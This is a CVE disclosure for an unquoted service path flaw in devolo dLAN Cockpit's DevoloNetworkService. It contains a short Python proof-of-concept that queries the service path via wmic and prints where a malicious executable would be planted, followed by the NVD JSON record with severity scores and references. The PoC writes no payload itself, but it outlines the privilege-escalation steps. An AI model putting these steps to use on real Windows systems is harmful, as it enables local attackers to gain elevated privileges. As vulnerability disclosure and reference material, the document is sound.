CVE-2019-25231

#!/usr/bin/env python3 # CVE-2019-25231 PoC - Unquoted Service Path Privilege Escalation # This PoC demonstrates the concept of exploiting unquoted service paths # Target: devolo dLAN Cockpit DevoloNetworkService import os import sys import subprocess import time def check_service_path(service_name): """Check if the service has an unquoted path with spaces""" try: cmd = f'wmic service where "name=\'{service_name}\'" get pathname' result = subprocess.check_output(cmd, shell=True, text=True) print(f"[+] Service path information:\n{result}") return True except Exception as e: print(f"[-] Error checking service: {e}") return False def create_payload(payload_path): """Create a malicious executable to be placed in the unquoted path""" # Note: This is for educational purposes only # Replace with actual malicious code in real attack scenarios print(f"[!] In a real attack, a malicious executable would be created at: {payload_path}") print("[!] Common paths to check for devolo dLAN Cockpit:") print(" C:\\Program.exe") print(" C:\\Program Files\\devolo.exe") return True def main(): service_name = "DevoloNetworkService" print(f"[*] CVE-2019-25231 PoC - {service_name} Unquoted Service Path") print("=" * 60) # Step 1: Check service configuration print("\n[1] Checking service configuration...") check_service_path(service_name) # Step 2: Identify exploitable paths print("\n[2] Identifying exploitable paths...") create_payload("C:\\Program.exe") # Step 3: Exploitation steps print("\n[3] Exploitation requires:") print(" - Local user access to the target system") print(" - Write permissions to system directories") print(" - Ability to restart the service or wait for reboot") print("\n[*] PoC demonstration complete") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2019-25231", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:57.063", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "devolo dLAN Cockpit 4.3.1 contains an unquoted service path vulnerability in the 'DevoloNetworkService' that allows local non-privileged users to potentially execute arbitrary code. Attackers can exploit the insecure service path configuration by inserting malicious code in the system root path to execute with elevated privileges during application startup or system reboot."}, {"lang": "es", "value": "devolo dLAN Cockpit 4.3.1 contiene una vulnerabilidad de ruta de servicio sin comillas en el 'DevoloNetworkService' que permite a usuarios locales no privilegiados ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la configuración insegura de la ruta de servicio insertando código malicioso en la ruta raíz del sistema para ejecutarse con privilegios elevados durante el inicio de la aplicación o el reinicio del sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2019020037", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/156594", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/151525", "source": "[email protected]"}, {"url": "https://www.devolo.global/", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5506.php", "source": "[email protected]"}]}}